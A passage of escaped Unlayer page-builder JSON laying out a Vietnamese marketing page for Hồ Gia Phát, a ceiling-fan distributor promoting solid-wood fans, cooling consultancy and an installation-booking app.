":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"i1aayj1OCs\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"1swPbJHMCz\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AVkIerpg3f\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_22\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_16\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"j9TnibP9Xl\\\",\\\"cells\\\":[48.17,51.83],\\\"columns\\\":[{\\\"id\\\":\\\"taZ8dzbo1M\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VivHHBb3e6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764821104-abacus.jpg\\\",\\\"width\\\":640,\\\"height\\\":426},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_20\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"9dOES5WBCA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qX8h97rG_z\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_27\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 (SOLID WOOD)<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"HjSkOv8qX8\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_28\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\"><strong>KI\\u1ec2U D\\u00c1NG HI\\u1ec6N \\u0110\\u1ea0I<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xrIkTs9OgD\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"13px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>THO\\u1ea2I M\\u00c1I S\\u00c1NG T\\u1ea0O TU\\u1ef2 CH\\u1eccN M\\u00c0U<\\/strong>\\\"}},{\\\"id\\\":\\\"eYdD2v3nEX\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#0e0f13\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_29\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay. B\\u1edfi g\\u1ed7 t\\u1ef1 nhi\\u00ean (Solid Wood) \\u0111\\u01b0\\u1ee3c \\u01b0a chu\\u1ed9ng b\\u1edfi d\\u1ec5 ph\\u1ed1i m\\u00e0u v\\u00e0 tu\\u1ef3 ch\\u1ec9nh tone m\\u00e0u c\\u00f9ng v\\u1edbi c\\u00e1c n\\u1ed9i th\\u1ea5t nh\\u00e0 chung c\\u01b0\\/nh\\u00e0 ph\\u1ed1 c\\u00f3 thi\\u1ebft k\\u1ebf g\\u1ed7 \\u00f3c ch\\u00f3, g\\u1ed7 s\\u1ed3i... t\\u1ea1o \\u0111i\\u1ec3m nh\\u1ea5n cho c\\u0103n ph\\u00f2ng c\\u00e0ng th\\u00eam phong c\\u00e1ch.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LuRH-I-q_Y\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-nha-o\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_7\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":109,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_15\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fyEFs2OfCp\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D0IQ6ZM4sR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"pRF-ulYOnC\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/du-an-da-trien-khai\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"20px 40px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_10\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM D\\u1ef0 \\u00c1N L\\u1eaeP \\u0110\\u1eb6T<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":256,\\\"calculatedHeight\\\":57}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"fkik_g4BzN\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2LQ7U_SkJw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"o71IKU6xIA\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#f1c40f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_3\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T\\\"}},{\\\"id\\\":\\\"hnCvJSjSYD\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"17px\\\",\\\"color\\\":\\\"#2dc26b\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_37\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\"}},{\\\"id\\\":\\\"Y4L0bNJWI7\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_30\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">L\\u01afU L\\u01af\\u1ee2NG KH\\u00d4NG KH\\u00cd, HI\\u1ec6U QU\\u1ea2 V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C C\\u01a0 QUAN L\\u00c0M VI\\u1ec6C<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rKNPh49QYC\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_33\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi kinh nghi\\u1ec7m h\\u01a1n 10 n\\u0103m cung c\\u1ea5p l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n. Hi\\u1ec7n nay HGP (H\\u1ed3 Gia Ph\\u00e1t) l\\u00e0 \\u0111\\u1ea1i \\u0111i\\u1ec7n ph\\u00e2n ph\\u1ed1i \\u0111\\u1ed9c quy\\u1ec1n cho th\\u01b0\\u01a1ng hi\\u1ec7u Big Ass Fans, Haiku - th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t h\\u00e0ng \\u0111\\u1ea7u c\\u1ee7a Hoa K\\u1ef3 v\\u00e0 Tổ chức đào tạo WIT (China), WildMill (India) - d\\u00f2ng qu\\u1ea1t tr\\u1ea7n trang tr\\u00ed c\\u1ed5 \\u0111i\\u1ec3n - \\u0111a d\\u1ea1ng ki\\u1ec3u d\\u00e1ng &amp; k\\u00edch th\\u01b0\\u1edbc.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"O4sajEw9_M\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"EFldpPdijy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"RIdDTofhYR\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontSize\\\":\\\"18px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng Mua H\\u00e0ng\\u00a0<br \\/>\\u0110\\u1eb7t l\\u1ecbch l\\u1eafp \\u0111\\u1eb7t - b\\u1ea3o tr\\u00ec\\\"}},{\\\"id\\\":\\\"zLMAztbOg2\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_6\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"ZkainPMVrL\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_38\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<ul style=\\\\\\\"list-style-type: square;\\\\\\\">\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n \\u0111\\u1eb7t h\\u00e0ng qu\\u1ea1t tr\\u1ea7n nhanh ?<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n s\\u1eed d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t qu\\u1ea1t tr\\u1ea7n chuy\\u00ean nghi\\u1ec7p?<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">B\\u1ea1n c\\u1ea7n d\\u1ecbch v\\u1ee5 b\\u1ea3o d\\u01b0\\u1ee1ng, b\\u1ea3o tr\\u00ec qu\\u1ea1t tr\\u1ea7n?<\\/li>\\\\n<\\/ul>\\\"}},{\\\"id\\\":\\\"cJl6xd24Sb\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_7\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_35\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"nOiOPuxKKt\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XReSYqXQor\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764058271-br-code-app.jpg\\\",\\\"width\\